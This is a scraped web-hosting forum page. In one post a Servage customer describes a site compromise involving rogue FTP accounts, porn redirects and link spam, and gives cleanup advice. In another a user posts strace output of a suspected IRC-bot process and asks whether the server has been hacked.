And so on and so forth.

Keys.txt is a giant list of pornographic phrases and texts.txt is just random phrases in general.

I have contacted servage about this multiple times and have gotten their basic cookie cutter response of please remove the files from all your websites, change all your passwords and delete the new ftp accounts created. I asked them point blank if they've been hacked and they've continued to say no.

If you are a servage customer, make SURE you log into your control panel RIGHT NOW and check to see if new ftp accounts have been created. After that, look at your website statistics and click on DISPLAYED PAGES and look for odd entries like /blabla.html/links?12982.html or some such thing and pay attention to where the link is showing up (What directory) which will help you remove all of the crap someone put on there.

This is very serious guys... as I said, someone had full access to my Control panel. With that, they could enter into any of my sql databases, fully see all the passwords to each database (as servage kindly shows your password to anyone when you click on connection information) not to mention any sensitive customer data I may have had stored in my databases.

This hack also kills your website in a number of ways:

1) It tries to redirect any page on your site to the index.php uploaded to your site which then directs you to porn sites.

2) This hack spams over 3000 links to google every day, coming from your website, leading to sites that are deemed bad by google. This ruins your page rank and your site, as some of mine have since I missed this latest attack for 2 weeks, will go down the drain.

3) WHen someone googles your website, it will come up with tons of porn links. My daughters site was one of the infected ones... she's 9, and when you look up her site it shows that it goes to porn.

let me know if you've been targeted as well and what we, if anything, can do about it. Servage NEEDS to admit they've been hacked, in fact, the damage to my businesses because of their failure to notify my of these events seems like it should be on their shoulders.

View Replies! View Related

Somebody Hacked My Server ...
I found a process /usr/sbin/httpd was running by nobody, then I did a trace in WHM and found this. Is my server hacked ?

send(4, "@206113irc10quakenet3org1"..., 34, MSG_NOSIGNAL) = 34
poll([{fd=4, events=POLLIN, revents=POLLIN}], 1, 5000) = 1
ioctl(4, FIONREAD, [162]) = 0
recvfrom(4, "@2062012001103irc10quakenet3org1"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("72.36.191.2")}, [16]) = 162
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(6665), sin_addr=inet_addr("83.140.172.210")}, 16) = -1 ETIMEDOUT (Connection timed out)
close(4) = 0
open("/etc/protocols", O_RDONLY) = 4
fcntl64(4, F_GETFD) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0

View Replies! View Related